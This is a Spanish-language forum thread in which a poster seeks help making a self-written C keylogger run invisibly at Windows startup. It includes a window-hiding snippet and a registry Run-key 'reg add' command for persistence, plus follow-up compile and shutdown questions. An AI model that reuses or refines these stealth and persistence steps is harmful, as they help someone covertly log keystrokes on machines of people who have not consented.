Saludos a todos, tengo una pregunta y la coloco aqui pues no sabia en donde ponerla... Y es lo siguiente: hice un Keylogger en C, en este keylogger hice una funcion para que se agregara al registro para que cada vez que inicie el SO arrancara el keylogger con él, ahora cada vez qeu arrenca el sistema operativo me sale la ventanita negra del keylogger, y no deberia pues en el codigo tambien le puse una linea para que me escondiera la ventana... ¿Cómo hago para que no me salga la ventana al iniciar el SO? Muchas Gracias..
Linea para esconder la ventana: HWND ventanita; ventana=GetForegroundWindow(); ShowWindow(ventana,SW_HIDE); para agregarlo al registro hice un batch porque en realidad no sabia como hacerlo en C.. lo hice asi: reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v test /t reg_sz /d C:\Windows\system32\test.exe /f eso es todo espero que me puedan ayudar.. gracias
Ok lo hice, pero me da un error al compilar.. el error que hay un conflicto con WinMain sigo el error y me arroja esto de la libreria winbase.h #ifndef UNDER_CE int APIENTRY WinMain(HINSTANCE,HINSTANCE,LPSTR,int); esa es la linea a donde me manda.. claro estoy pasando como parametros a int WinMain(int argc, char *argv[]) cuales son LPSTR y el int?? muchas gracias
Buenas de nuevo... ya arregle el problema utilizando WinMain... todo bello.. gracias.. ahora hay un problemita... cuando mando a apagar la maquina o a reiniciar o a cerrar sesion, me sale la clasica ventanita de windows diciendo finalizando tarea y es mi keylogger... qeu pudiera estar sucediendo??? gracias